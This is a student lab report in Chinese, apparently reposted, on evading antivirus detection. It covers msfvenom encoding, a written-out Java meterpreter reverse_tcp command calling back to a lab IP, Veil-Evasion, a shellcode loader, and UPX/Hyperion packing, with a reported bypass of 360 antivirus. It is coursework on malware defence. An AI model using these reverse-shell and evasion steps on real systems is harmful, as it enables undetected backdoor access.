2018-2019-3 网络对抗技术 20165305 Exp3 免杀原理与实践

时间 2019-12-18

原文原文链接

1.实验内容及步骤

1.1 正确使用msf编码器，msfvenom生成如jar之类的其余文件，veil-evasion，加壳工具，使用shellcode编程

将作实验二时生成的后门文件用virustotal网站检测，结果如图：
java

1.1.1正确使用msf编码器
使用msfvenom指令进行屡次编码，结果如图：
shell

1.1.2 msfvenom生成jar之类的其余文件文件
（1）使用msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.91.133 LPORT=5305 x> sxx_backdoor_java.jar生成jar文件。
检测结果如图所示：编程

（2）生成.apk后门程序
检测结果如图所示：windows

1.1.3使用veil-evasion生成后门程序并检测
启动veil-evasion，输入指令进入配置界面设置反弹链接IP和端口号，而后输入命令生成文件并设置文件名。（文件会保存到默认的路径下）
数组

检测结果以下·：
安全

1.1.4 Shellcode注入
（1）先生成C语言格式的shellcode数组，如图tcp

（2）生成一个.c文件，将生成的shellcode数组写入程序中。
（3）在kali下将这个.c文件编译成为.exe可执行文件
如图：
工具

（4）检测结果如图：
测试

（5）用360查杀，如图：
网站

1.1.5使用加壳工具
加壳可分为三种：

压缩壳
减小应用体积，如ASPack，UPX
加密壳
版权保护，反跟踪。如ASProtect,Armadillo
虚拟机
经过相似编译手段，将应用指令转换为本身设计的指令集。如VMProtect, Themida

（1）压缩壳
使用指令将.exe可执行文件压缩。
结果如图：

检测结果如图：

验证反弹链接结果：

（2）加密壳

将上一个生成的文件拷贝到/usr/share/windows-binaries/hyperion/目录中
进入目录/usr/share/windows-binaries/hyperion/中
输入命令wine hyperion.exe -v sxx_upxed.exe sxx_upxed_Hyperion.exe进行加壳。
结果如图：

1.2 经过组合应用各类技术实现恶意代码免杀

一种方法不可以达到免杀的目的，因此尝试一下多种组合可否成功。
半手工制做shellcode，加壳。
测试反弹链接：

查杀结果：

1.3用另外一电脑实测，在杀软开启的状况下，可运行并回连成功，注明电脑的杀软名称与版本

电脑win7，杀软360安全卫士，版本号11.5.0.2002
截图：

2.报告内容

2.1.基础问题回答

（1）杀软是如何检测出恶意代码的？
根据行为进行检测
根据文件的特征值进行分析
启发式恶意软件检测
（2）免杀是作什么？
经过一些方法，使恶意文件不被杀软查出来。
（3）免杀的基本方法有哪些？
加壳、修改文件的特征码等。

2.2.开启杀软能绝对防止电脑中恶意代码吗？

不能。恶意代码层出不穷，咱们须要常常更新杀软，这样咱们才能用杀软防护一些没有见过的恶意代码。

2.3.实践总结与体会

本次实验我主要是卡在了veil软件的安装，我安装了好长时间。本次的实验我最大的收获是提升了本身对于恶意软件的防范意识和能力，认识到了杀软并非万能的，因此咱们在平常生活中，若是须要下载软件，最好仍是要到官网下载。